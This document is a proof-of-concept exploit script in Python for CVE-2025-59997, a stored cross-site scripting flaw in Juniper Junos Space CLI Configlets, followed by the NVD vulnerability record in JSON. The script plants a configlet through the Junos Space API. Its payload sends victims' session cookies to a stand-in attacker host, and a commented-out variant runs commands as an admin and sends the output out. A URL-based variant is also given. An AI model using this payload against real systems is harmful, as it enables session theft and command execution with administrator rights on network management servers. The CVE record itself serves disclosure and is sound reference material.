CVE-2025-59997

# CVE-2025-59997 - Juniper Junos Space CLI Configlets XSS PoC # Vulnerability: Stored XSS in CLI Configlets pages # Affected: Junos Space versions before 24.1R4 import requests TARGET_URL = "https://junos-space-target.example.com" SESSION_COOKIE = "JSESSIONID=your_session_cookie_here" # Step 1: Authenticate to Junos Space (if not already authenticated) login_payload = { "username": "attacker_username", "password": "attacker_password" } # Step 2: Create a malicious CLI Configlet with injected XSS payload # The payload will execute in the context of any user viewing the Configlet xss_payload = """ <script> // Steal session cookies and send to attacker server var img = new Image(); img.src = 'https://attacker.example.com/steal?cookie=' + document.cookie; // Or perform actions as the victim (e.g., admin) // fetch('/api/space/command-management/cmd-execute', { // method: 'POST', // body: JSON.stringify({command: 'show configuration'}), // credentials: 'include' // }).then(r => r.text()).then(data => { // new Image().src = 'https://attacker.example.com/exfil?data=' + btoa(data); // }); </script> """ configlet_payload = { "name": "LegitimateConfiglet_<script>alert('XSS')</script>", "description": xss_payload, "scriptContent": "show version\n" + xss_payload, "category": "CLI" } # Step 3: Submit the malicious Configlet via Junos Space API headers = { "Cookie": SESSION_COOKIE, "Content-Type": "application/json" } response = requests.post( f"{TARGET_URL}/api/space/config-template-management/configlets", json=configlet_payload, headers=headers, verify=False ) if response.status_code == 200 or response.status_code == 201: print("[+] Malicious Configlet created successfully!") print("[+] When an admin views this Configlet, the XSS payload will execute.") else: print(f"[-] Failed to create Configlet. Status: {response.status_code}") print(f"[-] Response: {response.text}") # Alternative: Simple URL-based PoC for reflected/URL-injected variant # https://junos-space-target.example.com/configlets/view?name=<script>alert(document.domain)</script>

{"cve": {"id": "CVE-2025-59997", "sourceIdentifier": "[email protected]", "published": "2025-10-09T17:16:02.450", "lastModified": "2026-01-23T20:00:41.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Juniper Networks Junos Space allows an attacker to inject script tags in the CLI Configlets pages that, when visited by another user, enable the attacker to execute commands with the target's permissions, including an administrator.\nThis issue affects all versions of Junos Space before 24.1R4."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.1", "matchCriteriaId": "2EC090A9-634B-4AA2-916F-7548AF71FF76"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r1:*:*:*:*:*:*", "matchCriteriaId": "0566970C-0E9B-4566-9920-C7C436A4243D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r2:*:*:*:*:*:*", "matchCriteriaId": "A2AA399D-5A7D-45B8-B774-D69054DFA4D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:juniper:junos_space:24.1:r3:*:*:*:*:*:*", "matchCriteriaId": "57CC4E1A-23AA-4B4A-8690-5EEDCBEC4BBE"}]}]}], "references": [{"url": "https://supportportal.juniper.net/JSA103140", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}